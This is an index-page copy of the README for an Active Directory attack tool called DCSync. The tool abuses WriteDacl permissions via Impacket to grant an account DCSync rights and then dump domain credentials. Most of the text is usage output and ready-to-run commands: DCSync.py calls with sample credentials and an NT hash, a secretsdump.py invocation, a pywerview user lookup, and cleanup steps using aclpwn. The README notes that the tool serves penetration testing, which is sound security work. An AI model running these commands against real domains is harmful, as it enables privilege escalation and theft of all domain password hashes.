Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/n00py/DCSync

DCSync Attack from Outside using Impacket
https://github.com/n00py/DCSync

Last synced: 21 days ago
JSON representation

DCSync Attack from Outside using Impacket

Awesome Lists containing this project

README

        

# Adding DCSync Permissions
Mostly copypasta from https://github.com/tothi/rbcd-attack
```
usage: DCSync.py [-h] -dc FQDN -t USERNAME [-hashes LMHASH:NTHASH] [-k] identity

WriteDacl Attack: To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges.

positional arguments:
identity domain\username:password, attacker account with write access to target computer properties (NetBIOS domain name must be used!)

options:
-h, --help show this help message and exit
-dc FQDN FQDN of the Domain Controller
-t USERNAME Target user to be escalated in format *Distinguished Names*
-hashes LMHASH:NTHASH
Hash for LDAP auth (instead of password)
-k If you want to use a Kerberos ticket

Examples:
DCSync.py -dc dc01.n00py.local -t 'CN=n00py,OU=Employees,DC=n00py,DC=local' n00py\Administrator:Password123
DCSync.py -dc dc01.n00py.local -t 'CN=n00py,OU=Employees,DC=n00py,DC=local' n00py\Administrator -k
DCSync.py -dc dc01.n00py.local -t 'CN=spoNge369,CN=Users,DC=n00py,DC=local' 'n00py.local\user_with_writeDACL:P@$$w0rd123'
DCSync.py -dc dc01.n00py.local -t 'CN=spoNge369,CN=Users,DC=n00py,DC=local' 'n00py.local\user_with_writeDACL' -hashes :32693b11e6aa90eb43d32c72a07ceea6

DCSync Attack:
secretsdump.py 'n00py.local/spoNge369:[email protected]'

Search Distinguished Names(DN) of spoNge369:
pywerview get-netuser -u'any_valid_user' -p'password321$' -t dc01.n00py.local | perl -wnlE'print if/distinguishedname.+spoNge369/'

```

To clean up after you are done, use ACLpwn https://github.com/fox-it/aclpwn.py. This tool is pretty old and not maintained, but you can get it to work. One thing you will need to do is replace “neo4j.v1” with just “neo4j” in database.py. To restore the ACLs to the original configuration, use the restore state file created by the DCSync tool.

## Dependencies:

Impacket

`pip3 install pywerview`

For kerberos:
```
apt install heimdal-dev -y
apt install libkrb5-dev -y
python3 -m pip install gssapi
```